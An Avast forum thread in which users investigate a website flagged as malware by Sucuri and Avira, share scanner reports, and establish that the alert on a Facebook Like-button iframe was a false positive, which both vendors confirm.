Avast WEBforum
Other => Viruses and worms => Topic started by: !Donovan on November 30, 2011, 11:25:45 PM
-
I was doing some research for my project when I stumbled upon this site. VirusTotal reported Avira only detected it as showed here:
http://www.virustotal.com/file-scan/report.html?id=6a211a33e80eb62f4ef1b96f0574d06ac94082cf1b5f4defe1ce4bd14f594832-1322690872
Sucuri also says it contains malware:
web site: attractions(DOT)uptake(DOT)com
status: Site infected with malware
web trust: Not Blacklisted
warn: Wordpress version outdated: Upgrade required.
Known javascript malware.
Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD5
document.write(unescape('%3Ciframe src="http://www.facebook.com/plugins/like.php?href=' + thispageURL + ...
Donovansrb10
-
I am a developer at uptake.com. Can you give me some details on the exact url where you found this? I assume it is a post somewhere at http://attractions.uptake.com/blog/*.
We would like to
1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.
Thanks,
Doug Seifert
Uptake Networks, Inc.
-
Can you give me some details on the exact url where you found this?
he already have ::)
-
1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.
You can upgrade Wordpress to reduce the risk of having the site hijacked again.
-
Hi doug_uptake,
Follow Donovansrb10's advice and update your website software to avoid and reduce the chance of re-infection.
Also pay attention to this code that was flagged as suspicious:
-uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js suspicious
[suspicious:2] (ipaddr:72.21.211.171) (script) -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js
status: (referer=-attractions.uptake.com/blog/)saved 80392 bytes ce100fa33adfe4728c9002e13cf26a7d867940d1
info: [javascript variable] URL=
info: [javascript variable] URL=-boss.yahooapis.com/ysearch/images/v1/
info: [javascript variable] URL=-api.search.live.net/json.aspx?appid=
info: [img] -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable $.event
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var $.event = 1;
error: line:1: ....^
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
polonus
-
Hi Donovansrb10,
Make that link to -http://sucuri.net/malware/malware-entry-mwiframehd5 non-click-through, please, because the avast Webshields flags HTML:iFrame-EE[Trj] and rightly so. Even at descriptions of malcode or look-ups the avast shields may sound the alarm as the non-munged code example gets recognized, nothwithstanding the fact that it does not infect from there. Similar happened to me on several occasions when visiting jsunpack online service to analyze script or trying to open a particular piece of malcode on a URL through my malzilla browser. We know why this is, my friend, but the unaware forum visitor that click that description link may panick because he does not understand the avast shield reaction,
polonus
-
Why does Sucuri alert on a facebook like box?
Expecially as the malware entry that it links to is nothing to do with FB.
The MW:IFRAME:HD5 code on the page decodes do something completely unrelated.
-
Norman lab
attractions.uptake.com.htm - Clean!
-
Hi Pondus,
Also given clean here: http://urlquery.net/report.php?id=10206
and here: http://wepawet.iseclab.org/view.php?hash=dce20df22b857b454ffe81ef34df249b&t=1322776345&type=js
polonus
-
was going to post a FP case at Avira but the web seems down at the moment.....
-
Hi Pondus and spg SCOTT,
I do not see any iFrame that goes to -nuotoll.com,
see: http://www.google.com/safebrowsing/diagnostic?site=nuotoll.com/ as spg SCOTT pointed out in the image from SUCURI's he provided for us. For nuotoll dot com unmasked parasites informs that under certain circumstances third parties could add malicious code to legit sites for which Google Safe Browsing delivers this alert,
polonus
-
My point exactly. Sucuri highlights a facebook like button script as a malicious iframe.
It is not similar in anyway.
Is there a way to report something like this to securi?
-
Hi spg SCOTT,
I assume you could give a reaction on the blog they have going: http://blog.sucuri.net/
It qualifies somewhere under misdetection or false positive. At least it needs explanation.
I see sucuri as one of the better website monitoring scanning services, but they also meet with mistakes, omissions and have to clean out their daily dirt. Never take any detection for granted, always check with other scanners or go directly to the code as you do. That is the lesson we can take here.
Thank you very much, spg SCOTT, for diving into this issue and for the insight gained.
But we also should praise the young Donovansrb10 for starting this thread on this apparent new threat here. He sort of has put his HTML-homework to a good purpose if he stumbled upon a sucuri misdetection,
polonus
-
I found a contact email, and sent them an email. In under 30 minutes, I received this.
Not only is the scanning service very useful, they are very quick once notified :)
Scott
Hi Scott,
Thanks for sending the link to us. It is indeed a false positive and the scanner was fixed already, so it will not alert on it anymore.
Sorry for the confusion.
Thanks,
-
and from Avira lab
The file 'attractions.uptake.com.htm' has been determined to be 'FALSE POSITIVE'.In particular this means that this file is not malicious but a false alarm.Our analysts named the threat HTML/Rce.Gen.The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.Detection will be removed from our virus definition file (VDF) with one of the next updates.